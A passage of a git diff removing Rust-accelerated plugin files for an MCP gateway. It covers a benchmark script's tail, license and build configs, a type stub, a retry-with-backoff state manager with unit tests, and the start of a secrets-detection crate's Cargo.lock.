{avg_speedup:.2f}x faster") - print(f" Min: {min_speedup:.2f}x faster") - print(f" Max: {max_speedup:.2f}x faster") - - # Per-scenario breakdown - print("\n📈 Scenario Breakdown:") - print(f"{'Scenario':<45} {'Python (µs)':>14} {'Rust (µs)':>12} {'Speedup':>10}") - print(f"{'-' * 45} {'-' * 14} {'-' * 12} {'-' * 10}") - - for result in all_results: - name = result["name"][:44] - py_time = result["python"]["mean"] if result["python"] else float("inf") - rust_time = result["rust"]["mean"] if result["rust"] else float("inf") - speedup = result["speedup"] if result["speedup"] else float("inf") - - py_str = f"{py_time:>14.3f}" if py_time != float("inf") else "N/A" - rust_str = f"{rust_time:>12.3f}" if rust_time != float("inf") else "N/A" - speedup_str = f"{speedup:>10.2f}x" if speedup != float("inf") else "N/A" - - print(f"{name:<45} {py_str:>14} {rust_str:>12} {speedup_str:>10}") - - # Overall recommendation - print("\n💡 Recommendation:") - if speedups: - if avg_speedup >= 2.0: - print(" Rust implementation provides significant performance benefits") - print(f" ({avg_speedup:.1f}x average speedup). Recommended for production.") - elif avg_speedup >= 1.5: - print(f" Rust implementation offers moderate speedup ({avg_speedup:.1f}x).") - print(" Consider using for high-throughput scenarios.") - else: - print(f" Rust implementation shows marginal improvement ({avg_speedup:.1f}x).") - print(" Python may be sufficient for low-load use cases.") - - print(f"\n{'=' * 70}") - print("✅ Benchmark complete!") - print(f"{'=' * 70}\n") - - -if __name__ == "__main__": - main() diff --git a/plugins_rust/retry_with_backoff/deny.toml b/plugins_rust/retry_with_backoff/deny.toml deleted file mode 100644 index 142f5157ff..0000000000 --- a/plugins_rust/retry_with_backoff/deny.toml +++ /dev/null @@ -1,27 +0,0 @@ -# Cargo-deny config: license and policy checks for this crate. -# See https://embarkstudios.github.io/cargo-deny/ - -[licenses] -unused-allowed-license = "allow" -confidence-threshold = 0.95 -allow = [ - # Currently used across our Rust projects - "Apache-2.0", - "BSD-2-Clause", - "BSD-3-Clause", - "BSL-1.0", - "CC0-1.0", - "ISC", - "LGPL-2.1-or-later", - "MIT", - "MIT-0", - "OpenSSL", - "Unicode-3.0", - "Unicode-DFS-2016", - "Unlicense", - "Zlib", - # Common safe licenses in the Rust ecosystem - "0BSD", - "Apache-2.0 WITH LLVM-exception", - "Unicode-DFS-2015", -] diff --git a/plugins_rust/retry_with_backoff/pyproject.toml b/plugins_rust/retry_with_backoff/pyproject.toml deleted file mode 100644 index c5c835571c..0000000000 --- a/plugins_rust/retry_with_backoff/pyproject.toml +++ /dev/null @@ -1,16 +0,0 @@ -[build-system] -requires = ["maturin>=1.4,<2.0"] -build-backend = "maturin" - -[project] -name = "mcpgateway-retry-with-backoff" -version = "0.1.0" -description = "Rust-accelerated retry state manager for ContextForge" -license = { text = "Apache-2.0" } -requires-python = ">=3.11" - -[tool.maturin] -# The Python module name: `import retry_with_backoff_rust` -module-name = "retry_with_backoff_rust" -python-source = "python" -features = ["pyo3/extension-module"] diff --git a/plugins_rust/retry_with_backoff/python/retry_with_backoff_rust/__init__.pyi b/plugins_rust/retry_with_backoff/python/retry_with_backoff_rust/__init__.pyi deleted file mode 100644 index 7eae370797..0000000000 --- a/plugins_rust/retry_with_backoff/python/retry_with_backoff_rust/__init__.pyi +++ /dev/null @@ -1,22 +0,0 @@ -# This file is automatically generated by pyo3_stub_gen -# ruff: noqa: E501, F401, F403, F405 - -import builtins -import typing - -__all__ = [ - "RetryStateManager", -] - -@typing.final -class RetryStateManager: - def __new__(cls, max_retries: builtins.int, base_ms: builtins.int, max_ms: builtins.int, jitter: builtins.bool, retry_on_status: typing.Sequence[builtins.int]) -> RetryStateManager: ... - def ping(self) -> builtins.str: ... - def get_failures(self, tool: builtins.str, request_id: builtins.str) -> builtins.int: ... - def record_failure(self, tool: builtins.str, request_id: builtins.str) -> builtins.int: ... - def record_success(self, tool: builtins.str, request_id: builtins.str) -> None: ... - def delete_state(self, tool: builtins.str, request_id: builtins.str) -> None: ... - def state_count(self) -> builtins.int: ... - def compute_delay(self, attempt: builtins.int) -> builtins.int: ... - def check_failure(self, is_error: builtins.bool, status_code: typing.Optional[builtins.int]) -> builtins.bool: ... - def check_and_update(self, tool: builtins.str, request_id: builtins.str, is_error: builtins.bool, status_code: typing.Optional[builtins.int]) -> tuple[builtins.bool, builtins.int]: ... diff --git a/plugins_rust/retry_with_backoff/src/bin/stub_gen.rs b/plugins_rust/retry_with_backoff/src/bin/stub_gen.rs deleted file mode 100644 index c5cf230bc4..0000000000 --- a/plugins_rust/retry_with_backoff/src/bin/stub_gen.rs +++ /dev/null @@ -1,15 +0,0 @@ -// Copyright 2025 -// SPDX-License-Identifier: Apache-2.0 -// -// Stub file generator for retry_with_backoff module -// -// This binary generates Python type stub files (.pyi) for the retry_with_backoff module. -// Run with: cargo run --bin stub_gen - -use retry_with_backoff_rust::stub_info; - -fn main() { - let stub_info = stub_info().expect("Failed to get stub info"); - stub_info.generate().expect("Failed to generate stub file"); - println!("✓ Generated stub files successfully"); -} diff --git a/plugins_rust/retry_with_backoff/src/lib.rs b/plugins_rust/retry_with_backoff/src/lib.rs deleted file mode 100644 index 53caf132b7..0000000000 --- a/plugins_rust/retry_with_backoff/src/lib.rs +++ /dev/null @@ -1,532 +0,0 @@ -// Copyright 2025 -// SPDX-License-Identifier: Apache-2.0 - -use std::collections::{HashMap, HashSet}; -use std::sync::{Mutex, OnceLock}; -use std::time::Instant; - -use log::{debug, warn}; -use pyo3::prelude::*; -use pyo3_stub_gen::define_stub_info_gatherer; -use pyo3_stub_gen::derive::*; -use rand::Rng; - -// --------------------------------------------------------------------------- -// State struct — mirrors Python's _ToolRetryState dataclass. -// --------------------------------------------------------------------------- -pub struct ToolRetryState { - pub consecutive_failures: u32, - pub last_failure_at: f64, -} - -impl ToolRetryState { - fn new() -> Self { - ToolRetryState { - consecutive_failures: 0, - last_failure_at: 0.0, - } - } -} - -// --------------------------------------------------------------------------- -// Global state — mirrors Python's module-level _STATE dict. -// Mutex protects concurrent access; OnceLock ensures single initialisation. -// -// NOTE: This map is process-global and shared across all RetryStateManager -// instances. The gateway creates a single plugin instance so this is fine -// in practice, but if multiple instances with different configs are ever -// constructed they will share state entries. -// --------------------------------------------------------------------------- -static STATE: OnceLock>> = OnceLock::new(); - -/// Monotonic reference point — equivalent of Python's `time.monotonic()` epoch. -/// Using `Instant` instead of `SystemTime` ensures TTL eviction is immune to -/// wall-clock jumps from NTP sync or manual adjustment. -static MONO_EPOCH: OnceLock = OnceLock::new(); - -/// Entries older than this (in seconds) are considered orphaned — e.g. the -/// retry sleep was cancelled by a client disconnect — and are evicted. -const STATE_TTL_SECS: f64 = 300.0; - -/// Return a monotonic timestamp in seconds, analogous to Python's `time.monotonic()`. -fn monotonic_secs() -> f64 { - let epoch = MONO_EPOCH.get_or_init(Instant::now); - epoch.elapsed().as_secs_f64() -} - -fn state_map() -> &'static Mutex> { - STATE.get_or_init(|| Mutex::new(HashMap::new())) -} - -/// Remove entries whose `last_failure_at` is older than `STATE_TTL_SECS`. -/// Called under an already-held lock by `check_and_update`. -fn evict_stale(map: &mut HashMap) { - let cutoff = monotonic_secs() - STATE_TTL_SECS; - map.retain(|_, v| v.last_failure_at <= 0.0 || v.last_failure_at >= cutoff); -} - -fn make_key(tool: &str, request_id: &str) -> String { - format!("{tool}:{request_id}") -} - -// --------------------------------------------------------------------------- -// Pure functions — no PyO3 types. Called from RetryStateManager methods. -// --------------------------------------------------------------------------- - -// Exponential backoff with optional jitter, capped at max_ms. -fn compute_delay_ms(attempt: u32, base_ms: u64, max_ms: u64, jitter: bool) -> u64 { - let ceiling = base_ms - .saturating_mul(2u64.saturating_pow(attempt)) - .min(max_ms); - if jitter { - rand::thread_rng().gen_range(0..=ceiling) - } else { - ceiling - } -} - -// Checks the two pre-extracted failure signals: outer isError flag and status code. -// Text-content parsing (signal 3) is handled entirely in Python. -// -// When isError is true AND a status code is present (e.g. the gateway extracted -// it from an httpx.HTTPStatusError), the code is checked against retry_on_status -// so that non-transient HTTP errors (400, 401, 404 …) are not wastefully retried. -// Generic exceptions with no status code (connection errors, timeouts) are always -// considered retryable. -fn is_failure_from_signals( - is_error: bool, - status_code: Option, - retry_on_status: &HashSet, -) -> bool { - if is_error { - return match status_code { - Some(sc) => retry_on_status.contains(&sc), - None => true, - }; - } - if let Some(sc) = status_code { - return retry_on_status.contains(&sc); - } - false -} - -// --------------------------------------------------------------------------- -// Python-visible class. -// Config is stored in the struct — set once at construction, never -// re-allocated on the hot path. retry_on_status is kept as a HashSet for -// O(1) membership tests instead of the O(n) Vec scan it replaced. -// --------------------------------------------------------------------------- -#[gen_stub_pyclass] -#[pyclass] -pub struct RetryStateManager { - max_retries: u32, - base_ms: u64, - max_ms: u64, - jitter: bool, - retry_on_status: HashSet, -} - -#[gen_stub_pymethods] -#[pymethods] -impl RetryStateManager { - #[new] - fn new( - max_retries: u32, - base_ms: u64, - max_ms: u64, - jitter: bool, - retry_on_status: Vec, - ) -> Self { - debug!( - "RetryStateManager created: max_retries={max_retries} base_ms={base_ms} \ - max_ms={max_ms} jitter={jitter} retry_on_status={retry_on_status:?}" - ); - RetryStateManager { - max_retries, - base_ms, - max_ms, - jitter, - // Vec → HashSet: one-time allocation at construction; O(1) lookups thereafter. - retry_on_status: retry_on_status.into_iter().collect(), - } - } - - fn ping(&self) -> &str { - "retry_with_backoff_rust is alive" - } - - // Returns consecutive_failures for (tool, request_id), or 0 if absent. - fn get_failures(&self, tool: &str, request_id: &str) -> u32 { - let map = state_map().lock().unwrap(); - let key = make_key(tool, request_id); - map.get(&key).map(|s| s.consecutive_failures).unwrap_or(0) - } - - // Increments consecutive_failures and records the current timestamp. - fn record_failure(&self, tool: &str, request_id: &str) -> u32 { - let mut map = state_map().lock().unwrap(); - let key = make_key(tool, request_id); - let state = map.entry(key).or_insert_with(ToolRetryState::new); - state.consecutive_failures += 1; - state.last_failure_at = monotonic_secs(); - debug!( - "record_failure: tool={tool} request_id={request_id} consecutive_failures={}", - state.consecutive_failures - ); - state.consecutive_failures - } - - // Resets consecutive_failures to 0 without removing the entry. - fn record_success(&self, tool: &str, request_id: &str) { - let mut map = state_map().lock().unwrap(); - let key = make_key(tool, request_id); - if let Some(state) = map.get_mut(&key) { - state.consecutive_failures = 0; - debug!("record_success: tool={tool} request_id={request_id} — failure counter reset"); - } - } - - // Removes the state entry for a completed invocation (success or exhausted). - fn delete_state(&self, tool: &str, request_id: &str) { - let mut map = state_map().lock().unwrap(); - let key = make_key(tool, request_id); - let _ = map.remove(&key); - } - - // Number of active (tool, request_id) entries — useful for tests/debugging. - fn state_count(&self) -> usize { - state_map().lock().unwrap().len() - } - - fn compute_delay(&self, attempt: u32) -> u64 { - compute_delay_ms(attempt, self.base_ms, self.max_ms, self.jitter) - } - - fn check_failure(&self, is_error: bool, status_code: Option) -> bool { - is_failure_from_signals(is_error, status_code, &self.retry_on_status) - } - - // ----------------------------------------------------------------------- - // Main API called by the Python plugin on every post-invoke hook. - // - // Config (max_retries, base_ms, max_ms, jitter, retry_on_status) lives in - // self — no per-call allocations or list conversions cross the FFI boundary. - // Only the four truly dynamic arguments are passed. - // - // Returns (should_retry, delay_ms): - // (true, delay) — failure within budget; caller should schedule retry - // (false, 0) — success OR retries exhausted; caller propagates result - // - // The Mutex is held for the entire method to make the check-then-act - // sequence atomic. - // ----------------------------------------------------------------------- - fn check_and_update( - &self, - tool: &str, - request_id: &str, - is_error: bool, - status_code: Option, - ) -> (bool, u64) { - let failed = is_failure_from_signals(is_error, status_code, &self.retry_on_status); - - // Acquire the lock once for the entire check-then-act sequence. - let mut map = state_map().lock().unwrap(); - evict_stale(&mut map); - let key = make_key(tool, request_id); - - if failed { - let state = map.entry(key.clone()).or_insert_with(ToolRetryState::new); - state.consecutive_failures += 1; - state.last_failure_at = std::time::SystemTime::now() - .duration_since(std::time::UNIX_EPOCH) - .unwrap() - .as_secs_f64(); - - if state.consecutive_failures <= self.max_retries { - // attempt index is 0-based; saturating_sub guards against underflow. - let attempt = state.consecutive_failures.saturating_sub(1); - let delay = compute_delay_ms(attempt, self.base_ms, self.max_ms, self.jitter); - debug!( - "check_and_update: tool={tool} request_id={request_id} \ - failure={}/{} — retry in {delay}ms", - state.consecutive_failures, self.max_retries - ); - (true, delay) - } else { - warn!( - "check_and_update: tool={tool} request_id={request_id} \ - retry budget exhausted ({} failures) — propagating error", - state.consecutive_failures - ); - map.remove(&key); - (false, 0) - } - } else { - debug!( - "check_and_update: tool={tool} request_id={request_id} — success, state cleared" - ); - let _ = map.remove(&key); - (false, 0) - } - } -} - -// --------------------------------------------------------------------------- -// Module entry point. -// --------------------------------------------------------------------------- -#[pymodule] -fn retry_with_backoff_rust(m: &Bound<'_, PyModule>) -> PyResult<()> { - // Bridge Rust log records to Python's logging module. - // After this call, log::debug!/warn!/etc. emit to the logger named - // "retry_with_backoff_rust" in Python, respecting the Python log level. - pyo3_log::init(); - m.add_class::()?; - Ok(()) -} - -define_stub_info_gatherer!(stub_info); - -// --------------------------------------------------------------------------- -// Unit tests — pure Rust, no Python interpreter required. -// Run with: cargo test (or: make test) -// --------------------------------------------------------------------------- -#[cfg(test)] -mod tests { - use super::*; - use std::collections::HashSet; - - fn status_set(codes: &[i32]) -> HashSet { - codes.iter().cloned().collect() - } - - fn manager_with(base_ms: u64, max_ms: u64) -> RetryStateManager { - RetryStateManager::new(2, base_ms, max_ms, false, vec![500, 503]) - } - - // ── compute_delay_ms ──────────────────────────────────────────────────── - - #[test] - fn delay_attempt_zero_returns_base() { - assert_eq!(compute_delay_ms(0, 100, 10_000, false), 100); - } - - #[test] - fn delay_doubles_each_attempt() { - assert_eq!(compute_delay_ms(1, 100, 10_000, false), 200); - assert_eq!(compute_delay_ms(2, 100, 10_000, false), 400); - assert_eq!(compute_delay_ms(3, 100, 10_000, false), 800); - } - - #[test] - fn delay_is_capped_at_max_ms() { - assert_eq!(compute_delay_ms(10, 100, 500, false), 500); - } - - #[test] - fn delay_no_overflow_on_extreme_attempt() { - // saturating_pow / saturating_mul must not panic — result must equal cap. - let d = compute_delay_ms(63, 100, 5_000, false); - assert_eq!(d, 5_000, "expected cap, got {d}"); - } - - // ── is_failure_from_signals ───────────────────────────────────────────── - - #[test] - fn failure_when_is_error_true() { - assert!(is_failure_from_signals(true, None, &status_set(&[]))); - } - - #[test] - fn no_failure_when_is_error_false_and_no_status() { - assert!(!is_failure_from_signals(false, None, &status_set(&[]))); - } - - #[test] - fn failure_when_status_code_in_retry_set() { - assert!(is_failure_from_signals( - false, - Some(500), - &status_set(&[500, 503]) - )); - assert!(is_failure_from_signals( - false, - Some(503), - &status_set(&[500, 503]) - )); - } - - #[test] - fn no_failure_when_status_code_not_in_retry_set() { - assert!(!is_failure_from_signals( - false, - Some(200), - &status_set(&[500, 503]) - )); - assert!(!is_failure_from_signals( - false, - Some(404), - &status_set(&[500, 503]) - )); - } - - #[test] - fn is_error_with_non_retryable_status_does_not_retry() { - // isError=true + status_code NOT in retry set → not retryable. - assert!(!is_failure_from_signals(true, Some(200), &status_set(&[]))); - assert!(!is_failure_from_signals( - true, - Some(400), - &status_set(&[500, 503]) - )); - assert!(!is_failure_from_signals( - true, - Some(404), - &status_set(&[500, 503]) - )); - } - - #[test] - fn is_error_with_retryable_status_retries() { - assert!(is_failure_from_signals( - true, - Some(500), - &status_set(&[500, 503]) - )); - assert!(is_failure_from_signals( - true, - Some(503), - &status_set(&[500, 503]) - )); - } - - #[test] - fn is_error_without_status_always_retries() { - // isError=true with no status code → generic exception → always retry. - assert!(is_failure_from_signals(true, None, &status_set(&[]))); - assert!(is_failure_from_signals(true, None, &status_set(&[500]))); - } - - // ── make_key ──────────────────────────────────────────────────────────── - - #[test] - fn key_format_is_tool_colon_request() { - assert_eq!(make_key("my_tool", "req-123"), "my_tool:req-123"); - } - - #[test] - fn key_with_empty_parts() { - assert_eq!(make_key("", ""), ":"); - } - - // ── RetryStateManager: state helpers ──────────────────────────────────── - - #[test] - fn get_failures_returns_zero_for_unknown_key() { - let m = manager_with(100, 10_000); - assert_eq!(m.get_failures("unknown_t", "unknown_r"), 0); - } - - #[test] - fn record_failure_increments_and_get_failures_reads_back() { - let m = manager_with(100, 10_000); - let (tool, req) = ("state_rf_t", "state_rf_r"); - m.delete_state(tool, req); // clean slate - assert_eq!(m.record_failure(tool, req), 1); - assert_eq!(m.record_failure(tool, req), 2); - assert_eq!(m.get_failures(tool, req), 2); - m.delete_state(tool, req); - } - - #[test] - fn record_success_resets_failure_counter_to_zero() { - let m = manager_with(100, 10_000); - let (tool, req) = ("state_rs_t", "state_rs_r"); - m.delete_state(tool, req); - m.record_failure(tool, req); - m.record_failure(tool, req); - m.record_success(tool, req); - assert_eq!(m.get_failures(tool, req), 0); - m.delete_state(tool, req); - } - - #[test] - fn delete_state_removes_entry() { - let m = manager_with(100, 10_000); - let (tool, req) = ("state_del_t", "state_del_r"); - m.record_failure(tool, req); - m.delete_state(tool, req); - assert_eq!(m.get_failures(tool, req), 0); - } - - // ── RetryStateManager: check_and_update ───────────────────────────────── - - #[test] - fn check_and_update_success_returns_no_retry() { - let m = manager_with(100, 10_000); - let (retry, delay) = m.check_and_update("cau_ok_t", "cau_ok_r", false, None); - assert!(!retry); - assert_eq!(delay, 0); - } - - #[test] - fn check_and_update_first_failure_triggers_retry_with_base_delay() { - let m = manager_with(100, 10_000); - let (tool, req) = ("cau_f1_t", "cau_f1_r"); - m.delete_state(tool, req); - let (retry, delay) = m.check_and_update(tool, req, true, None); - assert!(retry, "expected retry on first failure"); - assert_eq!(delay, 100, "first failure should use base_ms (attempt 0)"); - m.delete_state(tool, req); - } - - #[test] - fn check_and_update_status_code_match_triggers_retry() { - let m = manager_with(100, 10_000); - let (tool, req) = ("cau_sc_t", "cau_sc_r"); - m.delete_state(tool, req); - let (retry, _) = m.check_and_update(tool, req, false, Some(500)); - assert!(retry, "status 500 should trigger retry"); - m.delete_state(tool, req); - } - - #[test] - fn check_and_update_delay_doubles_with_successive_failures() { - let m = RetryStateManager::new(2, 100, 10_000, false, vec![]); - let (tool, req) = ("cau_exp_t", "cau_exp_r"); - m.delete_state(tool, req); - let (_, d1) = m.check_and_update(tool, req, true, None); // attempt 0 → 100 - let (_, d2) = m.check_and_update(tool, req, true, None); // attempt 1 → 200 - assert_eq!(d1, 100); - assert_eq!(d2, 200); - m.delete_state(tool, req); - } - - #[test] - fn check_and_update_exhausts_budget_then_stops() { - let m = manager_with(100, 10_000); // max_retries = 2 - let (tool, req) = ("cau_ex_t", "cau_ex_r"); - m.delete_state(tool, req); - // First 2 failures are within budget. - for i in 1..=2 { - let (retry, _) = m.check_and_update(tool, req, true, None); - assert!(retry, "failure {i} should still be within retry budget"); - } - // 3rd failure exceeds max_retries — entry is removed, no retry. - let (retry, delay) = m.check_and_update(tool, req, true, None); - assert!(!retry, "retry budget exhausted — should not retry"); - assert_eq!(delay, 0); - } - - #[test] - fn check_and_update_success_after_failures_clears_state() { - let m = manager_with(100, 10_000); - let (tool, req) = ("cau_clr_t", "cau_clr_r"); - m.delete_state(tool, req); - m.check_and_update(tool, req, true, None); // record a failure - let (retry, delay) = m.check_and_update(tool, req, false, None); // success - assert!(!retry); - assert_eq!(delay, 0); - // Entry should be gone — subsequent get_failures returns 0. - assert_eq!(m.get_failures(tool, req), 0); - } -} diff --git a/plugins_rust/secrets_detection/Cargo.lock b/plugins_rust/secrets_detection/Cargo.lock deleted file mode 100644 index c5dc9a5f40..0000000000 --- a/plugins_rust/secrets_detection/Cargo.lock +++ /dev/null @@ -1,1397 +0,0 @@ -# This file is automatically @generated by Cargo. -# It is not intended for manual editing. -version = 4 - -[[package]] -name = "aho-corasick" -version = "1.1.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ddd31a130427c27518df266943a5308ed92d4b226cc639f5a8f1002816174301" -dependencies = [ - "memchr", -] - -[[package]] -name = "alloca" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e5a7d05ea6aea7e9e64d25b9156ba2fee3fdd659e34e41063cd2fc7cd020d7f4" -dependencies = [ - "cc", -] - -[[package]] -name = "android_system_properties" -version = "0.1.5" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "819e7219dbd41043ac279b19830f2efc897156490d7fd6ea916720117ee66311" -dependencies = [ - "libc", -] - -[[package]] -name = "anes" -version = "0.1.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4b46cbb362ab8752921c97e041f5e366ee6297bd428a31275b9fcf1e380f7299" - -[[package]] -name = "anstyle" -version = "1.0.13" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5192cca8006f1fd4f7237516f40fa183bb07f8fbdfedaa0036de5ea9b0b45e78" - -[[package]] -name = "anyhow" -version = "1.0.101" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5f0e0fee31ef5ed1ba1316088939cea399010ed7731dba877ed44aeb407a75ea" - -[[package]] -name = "arc-swap" -version = "1.8.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f9f3647c145568cec02c42054e07bdf9a5a698e15b466fb2341bfc393cd24aa5" -dependencies = [ - "rustversion", -] - -[[package]] -name = "autocfg" -version = "1.5.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c08606f8c3cbf4ce6ec8e28fb0014a2c086708fe954eaa885384a6165172e7e8" - -[[package]] -name = "bumpalo" -version = "3.19.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5dd9dc738b7a8311c7ade152424974d8115f2cdad61e8dab8dac9f2362298510" - -[[package]] -name = "cast" -version = "0.3.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "37b2a672a2cb129a2e41c10b1224bb368f9f37a2b16b612598138befd7b37eb5" - -[[package]] -name = "cc" -version = "1.2.56" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "aebf35691d1bfb0ac386a69bac2fde4dd276fb618cf8bf4f5318fe285e821bb2" -dependencies = [ - "find-msvc-tools", - "shlex", -] - -[[package]] -name = "cfg-if" -version = "1.0.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9330f8b2ff13f34540b44e946ef35111825727b38d33286ef986142615121801" - -[[package]] -name = "chrono" -version = "0.4.43" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "fac4744fb15ae8337dc853fee7fb3f4e48c0fbaa23d0afe49c447b4fab126118" -dependencies = [ - "iana-time-zone", - "js-sys", - "num-traits", - "wasm-bindgen", - "windows-link", -] - -[[package]] -name = "ciborium" -version = "0.2.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "42e69ffd6f0917f5c029256a24d0161db17cea3997d185db0d35926308770f0e" -dependencies = [ - "ciborium-io", - "ciborium-ll", - "serde", -] - -[[package]] -name = "ciborium-io" -version = "0.2.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "05afea1e0a06c9be33d539b876f1ce3692f4afea2cb41f740e7743225ed1c757" - -[[package]] -name = "ciborium-ll" -version = "0.2.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "57663b653d948a338bfb3eeba9bb2fd5fcfaecb9e199e87e1eda4d9e8b240fd9" -dependencies = [ - "ciborium-io", - "half", -] - -[[package]] -name = "clap" -version = "4.5.58" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "63be97961acde393029492ce0be7a1af7e323e6bae9511ebfac33751be5e6806" -dependencies = [ - "clap_builder", -] - -[[package]] -name = "clap_builder" -version = "4.5.58" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7f13174bda5dfd69d7e947827e5af4b0f2f94a4a3ee92912fba07a66150f21e2" -dependencies = [ - "anstyle", - "clap_lex", -] - -[[package]] -name = "clap_lex" -version = "1.0.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3a822ea5bc7590f9d40f1ba12c0dc3c2760f3482c6984db1573ad11031420831" - -[[package]] -name = "core-foundation-sys" -version = "0.8.7" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "773648b94d0e5d620f64f280777445740e61fe701025087ec8b57f45c791888b" - -[[package]] -name = "criterion" -version = "0.8.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "950046b2aa2492f9a536f5f4f9a3de7b9e2476e575e05bd6c333371add4d98f3" -dependencies = [ - "alloca", - "anes", - "cast", - "ciborium", - "clap", - "criterion-plot", - "itertools 0.13.0", - "num-traits", - "oorandom", - "page_size", - "plotters", - "rayon", - "regex", - "serde", - "serde_json", - "tinytemplate", - "walkdir", -] - -[[package]] -name = "criterion-plot" -version = "0.8.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d8d80a2f4f5b554395e47b5d8305bc3d27813bacb73493eb1001e8f76dae29ea" -dependencies = [ - "cast", - "itertools 0.13.0", -] - -[[package]] -name = "crossbeam-deque" -version = "0.8.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9dd111b7b7f7d55b72c0a6ae361660ee5853c9af73f70c3c2ef6858b950e2e51" -dependencies = [ - "crossbeam-epoch", - "crossbeam-utils", -] - -[[package]] -name = "crossbeam-epoch" -version = "0.9.18" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5b82ac4a3c2ca9c3460964f020e1402edd5753411d7737aa39c3714ad1b5420e" -dependencies = [ - "crossbeam-utils", -] - -[[package]] -name = "crossbeam-utils" -version = "0.8.21" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d0a5c400df2834b80a4c3327b3aad3a4c4cd4de0629063962b03235697506a28" - -[[package]] -name = "crunchy" -version = "0.2.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "460fbee9c2c2f33933d720630a6a0bac33ba7053db5344fac858d4b8952d77d5" - -[[package]] -name = "deranged" -version = "0.5.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cc3dc5ad92c2e2d1c193bbbbdf2ea477cb81331de4f3103f267ca18368b988c4" -dependencies = [ - "powerfmt", -] - -[[package]] -name = "either" -version = "1.15.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "48c757948c5ede0e46177b7add2e67155f70e33c07fea8284df6576da70b3719" - -[[package]] -name = "equivalent" -version = "1.0.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "877a4ace8713b0bcf2a4e7eec82529c029f1d0619886d18145fea96c3ffe5c0f" - -[[package]] -name = "find-msvc-tools" -version = "0.1.9" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5baebc0774151f905a1a2cc41989300b1e6fbb29aff0ceffa1064fdd3088d582" - -[[package]] -name = "getopts" -version = "0.2.24" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cfe4fbac503b8d1f88e6676011885f34b7174f46e59956bba534ba83abded4df" -dependencies = [ - "unicode-width", -] - -[[package]] -name = "getrandom" -version = "0.2.17" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ff2abc00be7fca6ebc474524697ae276ad847ad0a6b3faa4bcb027e9a4614ad0" -dependencies = [ - "cfg-if", - "libc", - "wasi", -] - -[[package]] -name = "half" -version = "2.7.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6ea2d84b969582b4b1864a92dc5d27cd2b77b622a8d79306834f1be5ba20d84b" -dependencies = [ - "cfg-if", - "crunchy", - "zerocopy", -] - -[[package]] -name = "hashbrown" -version = "0.16.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "841d1cc9bed7f9236f321df977030373f4a4163ae1a7dbfe1a51a2c1a51d9100" - -[[package]] -name = "heck" -version = "0.5.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2304e00983f87ffb38b55b444b5e3b60a884b5d30c0fca7d82fe33449bbe55ea" - -[[package]] -name = "iana-time-zone" -version = "0.1.65" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e31bc9ad994ba00e440a8aa5c9ef0ec67d5cb5e5cb0cc7f8b744a35b389cc470" -dependencies = [ - "android_system_properties", - "core-foundation-sys", - "iana-time-zone-haiku", - "js-sys", - "log", - "wasm-bindgen", - "windows-core", -] - -[[package]] -name = "iana-time-zone-haiku" -version = "0.1.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f31827a206f56af32e590ba56d5d2d085f558508192593743f16b2306495269f" -dependencies = [ - "cc", -] - -[[package]] -name = "indexmap" -version = "2.13.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7714e70437a7dc3ac8eb7e6f8df75fd8eb422675fc7678aff7364301092b1017" -dependencies = [ - "equivalent", - "hashbrown", -] - -[[package]] -name = "inventory" -version = "0.3.21" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "bc61209c082fbeb19919bee74b176221b27223e27b65d781eb91af24eb1fb46e" -dependencies = [ - "rustversion", -] - -[[package]] -name = "is-macro" -version = "0.3.7" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1d57a3e447e24c22647738e4607f1df1e0ec6f72e16182c4cd199f647cdfb0e4" -dependencies = [ - "heck", - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "itertools" -version = "0.11.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b1c173a5686ce8bfa551b3563d0c2170bf24ca44da99c7ca4bfdab5418c3fe57" -dependencies = [ - "either", -] - -[[package]] -name = "itertools" -version = "0.13.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "413ee7dfc52ee1a4949ceeb7dbc8a33f2d6c088194d9f922fb8318faf1f01186" -dependencies = [ - "either", -] - -[[package]] -name = "itertools" -version = "0.14.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = 